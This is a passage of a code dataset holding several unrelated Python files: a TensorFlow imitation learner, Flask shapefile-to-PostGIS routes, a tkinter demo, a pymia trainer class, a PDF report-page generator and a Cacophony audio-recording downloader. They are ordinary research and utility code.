np\r\nfrom sklearn.neighbors import LSHForest\r\nimport h5py\r\n\r\nimport NeuralNetwork as nn\r\n\r\ntf.logging.set_verbosity(0)\r\n\r\nclass imitationLearner():\r\n def __init__(self, session, param = param.neuralParam):\r\n #learner session\r\n self.sess = session\r\n #parameters of the learner\r\n self.param = param\r\n #placeholders\r\n self.input_ph = tf.placeholder(\r\n tf.float32, self.param.flat_input_shape, name=\"inputData_ph\")\r\n self.output_ph = tf.placeholder(\r\n tf.float32, self.param.output_shape, name=\"output_ph\")\r\n self.label_ph = tf.placeholder(\r\n tf.float32, self.param.output_shape, name=\"label_ph\")\r\n self.keep_prob = tf.placeholder(\r\n tf.float32, name=\"dropout_ph\")\r\n\r\n #Creates the learner and every operation necessary\r\n self.output_ph = nn.createLearner(self.input_ph,\r\n self.keep_prob,\r\n self.param)\r\n self.loss_op = self.loss()\r\n self.train_op = self.training()\r\n self.eval_op = self.evaluation()\r\n\r\n #datahandler for data manipulation\r\n self.dh = dh.dataHandler()\r\n\r\n\r\n def loss(self):\r\n# loss_op = tf.losses.log_loss(self.output_ph,self.label_ph)\r\n if self.param.loss == \"mse\":\r\n loss_op = tf.reduce_sum(tf.square(self.output_ph - self.label_ph))\r\n# elif self.param.loss == \"cos\":\r\n# loss_op = tf.losses.cosine_distance(self.label_ph,\r\n# self.output_ph)\r\n# elif self.param.loss == \"hinge\":\r\n# loss_op = tf.losses.hinge_loss(self.label_ph,\r\n# self.output_ph)\r\n elif self.param.loss == \"softmax\":\r\n loss_op = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(\r\n labels=tf.nn.softmax(self.label_ph),\r\n logits=tf.nn.softmax(self.output_ph)))\r\n# elif self.param.\r\n else:\r\n print('loss function not defined')\r\n raise\r\n#\r\n## tf.losses.log_loss(self.output_ph,\r\n## self.label_ph,\r\n## weights=2.0,\r\n## epsilon = 0.01)\r\n\r\n# loss_op = tf.nn.softmax_cross_entropy_with_logits(\r\n# labels=tf.nn.softmax(self.label_ph),\r\n# logits=self.output_ph)\r\n return loss_op\r\n\r\n\r\n\r\n def training(self):\r\n # Add a scalar summary for the snapshot loss.\r\n# tf.summary.scalar('loss', tf.reduce_mean(self.loss_op))\r\n # Create the gradient descent optimizer with the given learning rate.\r\n optimizer = tf.train.GradientDescentOptimizer(self.param.learning_rate)\r\n # Create a variable to track the global step.\r\n# train_op = tf.train.AdamOptimizer(self.param.learning_rate).minimize(self.loss_op)\r\n\r\n# train_op = tf.train.RMSPropOptimizer(self.param.learning_rate).minimize(self.loss_op)\r\n global_step = tf.Variable(0, name='global_step', trainable=False)\r\n# # Use the optimizer to apply the gradients that minimize the loss\r\n# #(and also increment the global step counter) as a single training step.\r\n train_op = optimizer.minimize(self.loss_op, global_step=global_step)\r\n return train_op\r\n\r\n\r\n\r\n def evaluation(self):\r\n correct_prediction = tf.equal(tf.argmax(self.label_ph,1),\r\n tf.argmax(self.output_ph,1))\r\n #Cast to floating point numbers and then take the mean\r\n return tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n\r\n\r\n def run(self):\r\n #Loads the MNIST dataset\r\n print(\"run\")\r\n self.dh.setFilename(\"mnist.hdf5\")#--------------modify\r\n testBatch = self.dh.loadBatch(\"test\")\r\n lsh = LSHForest(min_hash_match=8, n_candidates=10, n_estimators=50,\r\n n_neighbors=10, radius=10.0, radius_cutoff_ratio=0.5,\r\n random_state=42)\r\n dhGen = dh.dataHandler()\r\n\r\n total = self.dh.loadRange(0,70000)\r\n# print(total)\r\n total = total[:][0:794]\r\n lsh.fit(total)\r\n\r\n for i, data in enumerate(total):\r\n distances, indices = lsh.kneighbors(data[50], n_neighbors=2)\r\n # print(indices)\r\n # print(distances)\r\n if distances[0,0] < 1.1e-15:\r\n pass#identical in mem\r\n\r\n if distances[0,1] < 2.0e-01:\r\n pass#close in mem\r\n else:\r\n dhGen.addData(data)\r\n\r\n raise\r\n\r\n #separate data\r\n dataShape = self.dh.getDataShape()\r\n testData = testBatch[:,dataShape[0,0]:dataShape[0,1]]\r\n testLabel = testBatch[:,dataShape[1,0]:dataShape[1,1]]\r\n# self.dh.setFilename(\"rl_data.hdf5\")\r\n# with h5py.File(self.dh.fileName, \"r\", libver='latest') as f:\r\n# print(\"openFile\")\r\n# testList = f[\"batch/test/list\"]\r\n# testBatch = self.dh.load(testList[0:2000])\r\n# dataShape = self.dh.getDataShape()\r\n# testData = testBatch[:,dataShape[0,0]:dataShape[0,1]]\r\n# testLabel = testBatch[:,dataShape[1,0]:dataShape[1,1]]\r\n\r\n# dhGen = dh.dataHandler()\r\n# dataShape = self.dh.getDataShape()\r\n# print(dataShape)\r\n# raise\r\n\r\n # Add the variable initializer Op.\r\n init = tf.global_variables_initializer()\r\n\r\n #start the session\r\n self.sess.run(init)\r\n\r\n #load the test batch\r\n print(\" \".join([\"loading\",self.dh.fileName]))\r\n# testBatch = self.dh.loadBatch(\"test\")\r\n\r\n\r\n #Training loop\r\n print(\"Begin training\")\r\n# start_time = time.time()\r\n for step in range(self.param.max_steps):\r\n batch = self.dh.loadBatch()\r\n\r\n\r\n feed_dict = {self.input_ph:batch[:,dataShape[0,0]:dataShape[0,1]],\r\n self.label_ph:batch[:,dataShape[1,0]:dataShape[1,1]],\r\n self.keep_prob: 0.5}\r\n\r\n\r\n # Run one step of the model.\r\n _, loss = self.sess.run([self.train_op,self.loss_op],\r\n feed_dict=feed_dict)\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\n# if step >= 30000:\r\n# for d, l in zip(batch[:,dataShape[0,0]:dataShape[0,1]],loss):\r\n# dhGen.addData(d, l)\r\n\r\n #Show loss of network\r\n# if step % 10 == 0:\r\n# duration = time.time() - start_time\r\n# print('Step {0}: loss = {1:.10f} ({2:.3f} sec)'.format(step, loss, duration))\r\n# start_time = time.time()\r\n\r\n\r\n #Evaluate the model periodically.\r\n if (step + 1) % 100 == 0 or (step + 1) == self.param.max_steps:\r\n print(\"%g\"%self.sess.run(self.eval_op,\r\n feed_dict={\r\n self.input_ph: testData,\r\n self.label_ph: testLabel,\r\n self.keep_prob: 1.0}))\r\n# start_time = time.time()\r\n# dhGen.saveData()\r\n# tr, tst = dhGen.randList(64)\r\n# dhGen.createBatch(tr,\"training\")\r\n## dhGen.createBatch(tst,\"test\")\r\n# return dhGen\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sess = tf.Session()\r\n imit = imitationLearner(sess)\r\n d = imit.run()\r\n","sub_path":"imitationLearner.py","file_name":"imitationLearner.py","file_ext":"py","file_size_in_byte":7715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"272065432","text":"#Python modules\nimport os\nimport zipfile\n\n#Flask modules\nfrom flask import request, redirect, url_for, render_template, json, Response, jsonify, send_file, send_from_directory\nfrom werkzeug.utils import secure_filename\n\n#Custom modules\nfrom app import app\nfrom app.domain.shape import Shapefile\nfrom app.domain.table import Table\nfrom app.domain.user import User\nfrom app.infrastructure.shapefileRepository import ShapefileRepository\n\n#Global variables\ncurrentFileName = None\nglobalTableName = None\nconnections = dict()\n\n# @app.route('/auth', methods=['GET', 'POST'])\n# def auth():\n# global connection\n# global credentials\n# credentials = dict(request.json)\n# if connection.credentialsAreValid(credentials):\n# return json.dumps({\"isConnected\": True})\n# return json.dumps({\"isConnected\": False})\n\n@app.route('/auth', methods=['GET', 'POST'])\ndef auth():\n credentials = dict(request.json)\n connections[request.json['token']] = ShapefileRepository()\n if connections[request.json['token']].credentialsAreValid(credentials):\n return json.dumps({\"isConnected\": True})\n return json.dumps({\"isConnected\": False})\n\n\nUPLOAD_FOLDER = os.path.join(os.getcwd(), 'shapefiles')\n@app.route('/uploads', methods=['POST'])\ndef upload():\n file = request.files['shapefiles']\n savePath = os.path.join(UPLOAD_FOLDER, secure_filename(file.filename))\n file.save(savePath)\n return Response(status=201)\n \n\n@app.route('/getFieldsAndTables', methods=['POST'])\ndef fields():\n fileName = request.json['filename']\n shapefile = Shapefile(f'shapefiles/{fileName}.shp')\n return jsonify(fields = shapefile.getFields(),\n tables = connections[request.json['token']].getTables())\n\n\n@app.route('/columns/', methods=['POST'])\ndef columns(tableName):\n return json.dumps(connections[request.json['token']].getColumnsNames(tableName))\n\n\n@app.route('/save', methods=['POST'])\ndef save():\n selectedFields = request.json[\"message\"]\n fileName = request.json['filename']\n tableName = request.json['tableName']\n shapefile = Shapefile(f'shapefiles/{fileName}.shp')\n shapefile.format(selectedFields)\n returnedMessage = connections[request.json['token']].shpToPostgis(shapefile.DataDrame, connections[request.json['token']].getColumnsNames(tableName), tableName)\n return jsonify(message = returnedMessage)\n\n\n@app.route('/searchTables', methods=['POST'])\ndef searchTables():\n return jsonify(connections[request.json['token']].getTables())\n\n\nDOWNLOAD_FOLDER = os.path.join(os.getcwd(), 'download')\n@app.route('/recoverFile/', methods = [\"GET\", \"POST\"])\ndef recoverFile():\n tableName = request.json[\"selectedTable\"]\n selectedTable = Table(tableName, connections[request.json['token']].connector)\n try:\n selectedTable.extractShapefile(tableName, DOWNLOAD_FOLDER)\n except ValueError as erro:\n return erro + \" - Shapefile vazio\"\n #return redirect(f'/downloadFile/{tableName}')\n return Response(status=201)\n \n\n@app.route('/downloadFile/', methods = [\"GET\", \"POST\"])\ndef download(filename):\n #filename = request.json[\"selectedTable\"]\n downloadedFileName = f'{filename}.zip'\n downloadedFile = zipfile.ZipFile(f'{DOWNLOAD_FOLDER}/' + downloadedFileName, 'w')\n extensions = [\".shp\", \".shx\", \".dbf\", \".cpg\", \".qix\", \".prj\"]\n for extension in extensions:\n try:\n downloadedFile.write(f'download/{filename}/' + filename + extension, arcname = filename + extension)\n except:\n pass\n \n downloadedFile.close()\n return send_from_directory(directory = DOWNLOAD_FOLDER, filename = downloadedFileName)\n\n\n@app.route('/saveDirectly', methods = ['POST'])\ndef saveDirectly():\n filename = request.json[\"filename\"]\n shapefile = Shapefile(f'shapefiles/{filename}.shp')\n connections[request.json['token']].saveDirectly(shapefile.DataDrame, filename)\n return Response(status = 201)\n","sub_path":"EQUIPE 2/backend/app/view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"443830259","text":"\"\"\"\nThis code will open up a GUI with 2 overlapping frames\nA button will raise the other frame\n\"\"\"\nfrom tkinter import *\n\n\nclass AxisFrame:\n def __init__(self, master):\n self.master = master\n\n # Make Frame 1 with Button to Raise Frame 2\n self.frame1 = Frame(master, relief=SUNKEN, border=2)\n self.frame1.grid(row=0, column=0, sticky=\"nsew\")\n self.toolButton = Button(self.frame1, text=\"NOVA\", width=10, fg=\"Black\", bg=\"Sky Blue\",\n font=(\"Helvetica\", 14), command=lambda: self.show_lps())\n self.tool = Label(self.frame1, text=\"FRAME 1\", font=(\"Helvetica\", 14))\n\n self.toolButton.pack(side=LEFT, padx=10, pady=10)\n self.tool.pack(side=RIGHT, padx=10, pady=10)\n\n # Make Frame 2 with Button to Raise Frame 1\n self.frame2 = Frame(master, relief=SUNKEN, border=2)\n self.frame2.grid(row=0, column=0, sticky=\"nsew\")\n self.toolButton = Button(self.frame2, text=\"LPS-1000\", width=10, fg=\"Black\", bg=\"Yellow\",\n font=(\"Helvetica\", 14), command=lambda: self.show_nova())\n self.tool = Label(self.frame2, text=\"FRAME 2\", font=(\"Helvetica\", 14))\n\n self.toolButton.pack(side=LEFT, padx=10, pady=10)\n self.tool.pack(side=RIGHT, padx=10, pady=10)\n\n def show_nova(self):\n self.frame1.lift()\n\n def show_lps(self):\n self.frame2.lift()\n\n\nclass Main:\n def __init__(self, master):\n self.master = master\n master.geometry(\"650x650\")\n master.title(\"R0: TIMC - Piping\")\n self.circ = AxisFrame(self.master)\n\n\nroot = Tk()\nTIMC = Main(root)\nroot.mainloop()\n","sub_path":"Development/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"639698625","text":"import abc\nimport logging\nimport random\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\n\nimport pymia.data.assembler as asmbl\nimport pymia.deeplearning.config as cfg\nimport pymia.deeplearning.data_handler as hdlr\nimport pymia.deeplearning.logging as log\nimport pymia.deeplearning.tensorflow.model as mdl\nimport pymia.deeplearning.training as train\n\n\nclass TensorFlowTrainer(train.Trainer, abc.ABC):\n\n def __init__(self, data_handler: hdlr.DataHandler, logger: log.Logger, config: cfg.DeepLearningConfiguration,\n model: mdl.TensorFlowModel, session: tf.Session):\n \"\"\"Initializes a new instance of the TensorFlowTrainer class.\n\n The subclasses need to implement following methods:\n\n - validate_on_subject\n - init_subject_assembler\n\n Args:\n data_handler: A data handler for the training and validation datasets.\n logger: A logger, which logs the training process.\n config: A configuration with training parameters.\n model: The model to train.\n session: A TensorFlow session.\n \"\"\"\n super().__init__(data_handler, logger, config, model)\n\n self.session = session\n self.model = model # set by base class too but done here such that IDE knows it is of type TensorFlowModel\n\n # init TensorFlow\n global_initializer_op = tf.global_variables_initializer()\n local_initializer_op = tf.local_variables_initializer() # e.g. for tf.metrics variables\n self.session.run(global_initializer_op)\n self.session.run(local_initializer_op)\n\n def batch_to_feed_dict(self, batch: dict, is_training: bool):\n \"\"\"Generates the TensorFlow feed dictionary.\n\n This basic implementation adds x, y, and is_training to the feed dictionary. Override this method to add further\n data to the feed dictionary.\n\n Args:\n batch: The batch from the data loader.\n is_training: Indicates whether it is the training or validation / testing phase.\n\n Returns:\n The feed dictionary.\n \"\"\"\n feed_dict = {self.model.x_placeholder: np.stack(batch['images'], axis=0),\n self.model.y_placeholder: np.stack(batch['labels'], axis=0),\n self.model.is_training_placeholder: is_training}\n\n return feed_dict\n\n def train_batch(self, idx, batch: dict):\n feed_dict = self.batch_to_feed_dict(batch, True)\n\n prediction, _, loss_val = self.session.run([self.model.network, self.model.optimizer, self.model.loss],\n feed_dict=feed_dict)\n\n if idx % self.log_nth_batch == 0:\n self.logger.log_batch(self.current_step, feed_dict=feed_dict)\n\n logging.info('Epoch {}, batch {}/{:d}: loss={:5f}'\n .format(self._get_current_epoch_formatted(),\n self._get_batch_index_formatted(idx),\n len(self.data_handler.loader_train),\n loss_val))\n\n self.current_step += 1\n\n return prediction, loss_val * len(batch['images'])\n\n def validate_batch(self, idx: int, batch: dict) -> (np.ndarray, float):\n \"\"\"Validates a batch.\n\n Args:\n idx: The batch index.\n batch: The batch.\n\n Returns:\n A tuple with the prediction and the loss value.\n \"\"\"\n feed_dict = self.batch_to_feed_dict(batch, False)\n prediction, loss_val = self.session.run([self.model.network, self.model.loss], feed_dict=feed_dict)\n return prediction, loss_val * len(batch['images'])\n\n def set_seed(self):\n \"\"\"Sets the seed depending of the current epoch.\n\n The seed is updated at the beginning of every epoch to ensure reproducible experiments.\n \"\"\"\n seed = self.seed + self.current_epoch\n logging.info('Epoch {}: Set seed to {}'.format(self._get_current_epoch_formatted(), seed))\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n torch.manual_seed(seed) # because pymia.data depends on torch\n\n def _check_and_load_if_model_exists(self):\n if self.model.load(self.model_dir):\n self.current_epoch = self.model.epoch.eval() + 1 # we save models always AFTER we finished an epoch,\n # now we enter the next epoch\n self.current_step = self.model.global_step.eval() # global step is incremented AFTER we have seen a batch\n self.best_model_score = self.model.best_model_score.eval()\n else:\n self.current_epoch = 1\n self.current_step = 0\n\n @abc.abstractmethod\n def init_subject_assembler(self) -> asmbl.Assembler:\n raise NotImplementedError('init_subject_assembler')\n\n @abc.abstractmethod\n def validate_on_subject(self, subject_assembler: asmbl.Assembler, is_training: bool):\n raise NotImplementedError('validate_on_subject')","sub_path":"pymia/deeplearning/tensorflow/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"292142272","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ntemplate = \"\"\"---\nlayout: report\nimage: {ENGAGEMENT_PREVIEW_IMAGE} \nteam: {TEAM}\nengagement_name: {ENGAGEMENT} \nengagement_preview_file: {ENGAGEMENT_PREVIEW_IMAGE} \nengagement_pdf_file: {ENGAGEMENT_PDF_FILE} \nreport_keywords: {KEYWORDS}\nreport_cves: {CVES}\nreport_commands: {COMMANDS}\n\n# Page specifics\ntitle: {TEAM} - {ENGAGEMENT} \ndescription: View and download a complete penetration test report from {TEAM}. Learn about {TEAM}'s methodology and tools used in pentest reports.\n---\n\"\"\"\n\ndata = {\n\t\"items\": []\n}\n\nimport os\n\nfrom typing import List, Set\nimport subprocess\nfrom shlex import quote\n\nimport logging\nlogging.basicConfig(format='%(levelname)s %(message)s', level=logging.DEBUG)\n\nimport re\nimport pandas as pd\nimport PyPDF2\nfrom gensim.summarization import keywords\n\nimport json\n\nwith open('_scripts/commands.json') as commands_file:\n\tcommands = json.load(commands_file)[\"commands\"]\n\ncommand_names = [command[\"name\"].lower() for command in commands]\n\ndef extract_text(pdf_filename) -> str:\n\ttext = \"\"\n\twith open(pdf_filename, 'rb') as pdf_fd:\n\t\tpdf_reader = PyPDF2.PdfFileReader(pdf_fd)\n\t\tfor page in pdf_reader.pages:\n\t\t\ttry:\n\t\t\t\ttext += page.extractText()\n\t\t\texcept:\n\t\t\t\tpass\n\n\treturn text\n\ndef extract_keywords(text: str) -> List[str]:\n\tvalues = keywords(text = text, split = '\\n', scores = True)\n\tdata = pd.DataFrame(values, columns = ['keyword', 'score'])\n\tdata = data.sort_values('score', ascending = False)\n\treport_keywords = data[\"keyword\"].tolist()\n\treturn report_keywords\n\ndef extract_cves(text: str) -> Set[str]:\n\tr = re.compile(r'cve-\\d\\d\\d\\d-\\d\\d\\d\\d', re.IGNORECASE)\n\treturn set(sorted(re.findall(r, text)))\n\ndef extract_commands(text: str) -> Set[str]:\n\treturn [command_name for command_name in command_names if command_name in text]\n\nfor entry in os.listdir(\"reports\"):\n\tif entry not in [\".\", \"..\", \"index.md\"]:\n\t\tlogging.info('entry %s', entry)\n\t\treportDirName = \"reports/\" + entry\n\t\tfor file in os.listdir(os.path.join(\"reports\", entry)):\n\t\t\tif file.endswith(\".pdf\"):\n\t\t\t\tpdf_filename = f\"{reportDirName}/{file}\"\n\t\t\t\tlogging.info('file %s', file)\n\n\t\t\t\treport_text = extract_text(pdf_filename)\n\t\t\t\treport_text_lowered = report_text.lower()\n\n\t\t\t\treport_keywords = extract_keywords(report_text_lowered)\n\t\t\t\treport_cves = extract_cves(report_text)\n\t\t\t\treport_commands = extract_commands(report_text_lowered)\n\n\t\t\t\tbasefile = file[0:-4]\n\t\t\t\ttitle = basefile.replace('_', ' ')\n\t\t\t\tcontent = template.format(\n\t\t\t\t\tTEAM = entry,\n\t\t\t\t\tENGAGEMENT = title, \n\t\t\t\t\tENGAGEMENT_PREVIEW_IMAGE = f\"/reports/{entry}/{basefile}.png\",\n\t\t\t\t\tENGAGEMENT_PDF_FILE = basefile + '.pdf',\n\t\t\t\t\tKEYWORDS = ', '.join(report_keywords),\n\t\t\t\t\tCVES = ', '.join(report_cves),\n\t\t\t\t\tCOMMANDS = ','.join(report_commands)\n\t\t\t\t)\n\t\t\t\twith open(f\"reports/{entry}/{basefile}.md\", 'w') as fd:\n\t\t\t\t\tfd.write(content)\n\n\t\t\t\tdata[\"items\"].append({\n\t\t\t\t\t\"name\": f\"{entry} - {title}\",\n\t\t\t\t\t\"link\": f\"/reports/{entry}/{basefile}.html\" \n\t\t\t\t})\n\n\t\t\t\tos.system(\"pdftoppm -singlefile -png -f 1 -l 1 \" + quote(pdf_filename) + \" \" + quote(f\"{reportDirName}/{basefile}\"))\n\nimport yaml\n\nclass Dumper(yaml.Dumper):\n\tdef increase_indent(self, flow=False, *args, **kwargs):\n\t\treturn super().increase_indent(flow=flow, indentless=False)\n\nwith open(\"_data/reports.yml\", 'w') as fd:\n fd.write(yaml.dump(data, sort_keys=False, Dumper=Dumper))\n\n","sub_path":"_scripts/generate-report-data.py","file_name":"generate-report-data.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"158566149","text":"\nimport sqlite3\nfrom sqlite3 import Error\nimport requests\nimport os\nimport sys\nimport json\nfrom pathlib import Path\nfrom tkinter import filedialog\nfrom tkinter import *\nimport re\nfrom scipy.io import wavfile\nimport shutil\n# import scikits.audiolab\n# import sckikits as sc\n# \n# from sc import Sndfile, Format\n\nimport parameters\n\n\nimport glob\n\nimport numpy as np\nimport soundfile as sf\nimport librosa\n\n# from soundfile import SoundFile\n\n# import scipy.io\n# \n# import wavio\n# from code.Analysis import what\n# \n# ffmpegEXE = 'ffmpeg' # or ffmpeg.exe on windows etc\n# import subprocess as sp\n# \n# from pydub import AudioSegment\n# from scipy.io.wavfile import read\n\n\n#path to configs\n# sys.path.append('/home/jonah/Documents/opensmile-2.3.0/config/')\nsys.path.append('/home/tim/opensmile-2.3.0/config/')\n#path to input files\nsearch_path = '/home/tim/Work/Cacophony/opensmile_weka/TestAudioInput'\n#path to where we want the output\narff_path = '/home/tim/Work/Cacophony/opensmile_weka/TestAudioOutput'\n\n\ndb_file = \"audio_analysis_db\"\nconn = None\n\ndef get_database_connection():\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n\n # https://stackoverflow.com/questions/8587610/unboundlocalerror-local-variable-conn-referenced-before-assignment\n global conn\n if conn is None:\n try:\n conn = sqlite3.connect(db_file) \n except Error as e:\n print(e)\n \n return conn \n \n\ndef get_tags_from_server(device_id):\n print('about to get tags from server for device ', device_id)\n \n\ndef get_recordings_from_server(device_name, device_super_name):\n if not device_name:\n print('Device name can NOT be null')\n return\n \n if not device_super_name:\n print('Device Super name can NOT be null')\n return \n \n print('About to get recordings from server')\n retrieve_available_recordings_from_server(device_name, device_super_name)\n \ndef get_latest_recording_id_from_local_db(device_name, device_super_name):\n # Need the last recording ID for this device, that we already have \n\n# https://docs.python.org/2/library/sqlite3.html\n sql = ''' SELECT audio_file_id FROM audio_files WHERE device_super_name = ? ORDER BY audio_file_id DESC LIMIT 1'''\n cur = get_database_connection().cursor() \n \n cur.execute(sql,(device_super_name,)) \n \n rows = cur.fetchall() \n for row in rows:\n return row[0]\n \ndef retrieve_available_recordings_from_server(device_name, device_super_name): \n\n recordings_folder = getRecordingsFolder() \n\n ids_of_recordings_to_download = get_recording_ids_for_device_name(device_name)\n \n # remove ids of recordings that we already have\n already_downloaded = []\n for file in os.listdir(recordings_folder):\n already_downloaded.append(os.path.splitext(file)[0])\n \n already_downloaded_set = set(already_downloaded) \n \n ids_of_recordings_to_still_to_download = []\n \n for recording_id in ids_of_recordings_to_download:\n if not recording_id in already_downloaded_set:\n ids_of_recordings_to_still_to_download.append(recording_id)\n else:\n print('Aleady have recording ',recording_id, ' so will not download')\n \n for recording_id in ids_of_recordings_to_still_to_download:\n# print('About to get token for downloading ',recording_id)\n token_for_retrieving_recording = get_token_for_retrieving_recording(recording_id)\n print('About to get recording ',recording_id)\n get_recording_from_server(token_for_retrieving_recording, recording_id, device_name, device_super_name)\n \n # Also get recording information from server\n update_recording_information_for_single_recording(recording_id)\n \n print('Finished retrieving recordings') \n print('Now going to retrieve tags') \n get_all_tags_for_all_devices_in_local_database()\n print('Finished retrieving tags') \n print('Finished all') \n \ndef get_recording_from_server(token_for_retrieving_recording, recording_id, device_name, device_super_name):\n try:\n \n recording_local_filename = getRecordingsFolder() + '/' + recording_id + '.m4a'\n \n # Don't download it if we already have it. \n \n if not os.path.exists(recording_local_filename):\n url = parameters.server_endpoint + parameters.get_a_recording\n querystring = {\"jwt\":token_for_retrieving_recording} \n \n resp_for_getting_a_recording = requests.request(\"GET\", url, params=querystring)\n \n if resp_for_getting_a_recording.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp_for_getting_a_recording.text)\n return \n \n with open(recording_local_filename, 'wb') as f: \n f.write(resp_for_getting_a_recording.content)\n \n # Update local database\n insert_recording_into_database(recording_id,recording_id + '.m4a' ,device_name,device_super_name)\n \n else:\n print('\\t\\tAlready have recording ', str(recording_id) , ' - so will not download again\\n')\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to download recording ' + str(recording_id), '\\n')\n \ndef get_token_for_retrieving_recording(recording_id):\n user_token = get_cacophony_user_token()\n\n get_a_token_for_recording_endpoint = parameters.server_endpoint + parameters.get_a_token_for_getting_a_recording_url + recording_id\n\n headers = {'Authorization': user_token}\n\n resp_for_getting_a_recordingToken = requests.request(\"GET\", get_a_token_for_recording_endpoint, headers=headers)\n if resp_for_getting_a_recordingToken.status_code != 200:\n sys.exit('Could not get download token - exiting')\n recording_data = resp_for_getting_a_recordingToken.json()\n recording_download_token = recording_data['downloadFileJWT']\n \n return recording_download_token\n \ndef get_recording_ids_for_device_name(device_name): \n \n print('device_name ', device_name)\n \n device_id = get_device_id_using_device_name(device_name)\n print('device_id is ', device_id)\n ids_recordings_for_device_name = []\n offset = 0\n while True:\n ids_of_recordings_to_download= get_ids_of_recordings_to_download_using_deviceId(device_id,offset)\n print('ids_of_recordings_to_download ', ids_of_recordings_to_download)\n ids_recordings_for_device_name += ids_of_recordings_to_download\n if (len(ids_of_recordings_to_download) > 0):\n offset+=300\n else:\n break\n return ids_recordings_for_device_name\n\ndef get_ids_of_recordings_to_download_using_deviceId(deviceId, offset):\n # This will get a list of the recording ids for every recording of length 59,60,61,62 from device_name\n user_token = get_cacophony_user_token()\n \n url = parameters.server_endpoint + parameters.query_available_recordings\n \n where_param = {}\n where_param['DeviceId'] = deviceId\n where_param['duration'] = 59,60,61,62\n json_where_param = json.dumps(where_param) \n querystring = {\"offset\":offset, \"where\":json_where_param} \n \n headers = {'Authorization': user_token} \n\n resp = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n if resp.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp.text)\n sys.exit('Could not download file - exiting') \n \n data = resp.json() \n \n \n recordings = data['rows'] \n \n print('Number of recordings is ', len(recordings))\n\n ids_of_recordings_to_download = [] \n for recording in recordings: \n recording_id = str(recording['id'])\n ids_of_recordings_to_download.append(recording_id)\n \n return ids_of_recordings_to_download \n\ndef get_device_id_using_device_name(device_name):\n user_token = get_cacophony_user_token()\n url = parameters.server_endpoint + parameters.devices\n \n headers = {'Authorization': user_token} \n\n resp = requests.request(\"GET\", url, headers=headers)\n \n if resp.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp.text)\n sys.exit('Could not download file - exiting')\n \n data = resp.json()\n\n devices = data['devices'] \n rows = devices['rows']\n for row in rows:\n devicename = row['devicename'] \n if devicename == device_name:\n device_id = row['id']\n return device_id \n \ndef get_cacophony_user_token():\n if parameters.cacophony_user_token:\n return parameters.cacophony_user_token\n \n print('About to get user_token from server')\n username = parameters.cacophony_user_name\n if parameters.cacophony_user_password == '':\n parameters.cacophony_user_password = input(\"Enter password for Cacophony user \" + username + \" (or change cacophony_user_name in parameters file): \")\n \n requestBody = {\"nameOrEmail\": username, \"password\": parameters.cacophony_user_password }\n login_endpoint = parameters.server_endpoint + parameters.login_user_url\n resp = requests.post(login_endpoint, data=requestBody)\n if resp.status_code != 200:\n # This means something went wrong.\n sys.exit('Could not connect to Cacophony Server - exiting')\n \n data = resp.json()\n parameters.cacophony_user_token = data['token']\n return parameters.cacophony_user_token\n \ndef load_recordings_from_local_folder(device_name, device_super_name):\n \n input_folder = filedialog.askdirectory()\n\n recordings_folder = getRecordingsFolder()\n \n for filename in os.listdir( input_folder):\n recording_id = filename.replace('-','.').split('.')[0]\n filename2 = recording_id +'.m4a'\n\n insert_recording_into_database(recording_id,filename2,device_name,device_super_name)\n \n # Now move file to recordings folder\n audio_in_path = input_folder + '/' + filename \n audio_out_path = recordings_folder + '/' + filename2\n \n print('Moving ', filename, ' to ', audio_out_path)\n os.rename(audio_in_path, audio_out_path)\n\n # Now need to get information about this recording from server\n update_recording_information_for_single_recording(recording_id)\n \ndef insert_recording_into_database(recording_id,filename,device_name,device_super_name):\n try:\n sql = ''' INSERT INTO recordings(recording_id,filename,device_name,device_super_name)\n VALUES(?,?,?,?) '''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recording_id,filename,device_name,device_super_name))\n \n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert recording ' + str(recording_id), '\\n')\n \n\ndef update_recordings_folder(recordings_folder):\n print(\"new_recording_folder \", recordings_folder)\n \"\"\"\n update priority, begin_date, and end date of a task\n :param conn:\n :param recordings_folder:\n :return: project id\n \"\"\"\n sql = ''' UPDATE settings\n SET downloaded_recordings_folder = ? \n WHERE ID = 1'''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recordings_folder,))\n get_database_connection().commit() \n \ndef getRecordingsFolder():\n\n cur = get_database_connection().cursor()\n cur.execute(\"select * from settings\")\n \n rows = cur.fetchall()\n home = str(Path.home())\n print('home ', home)\n \n for row in rows: \n return home + '/' + row[0] \n \n \ndef getRecordingsFolderWithOutHome():\n cur = get_database_connection().cursor()\n cur.execute(\"select * from settings\")\n \n rows = cur.fetchall() \n \n for row in rows: \n return row[0] \n \ndef saveSettings(recordings_folder):\n print('recordings_folder ', recordings_folder)\n #https://stackoverflow.com/questions/16856647/sqlite3-programmingerror-incorrect-number-of-bindings-supplied-the-current-sta\n update_recordings_folder(recordings_folder)\n \ndef update_recording_information_for_single_recording(recording_id):\n print('About to update recording information for recording ', recording_id) \n recording_information = 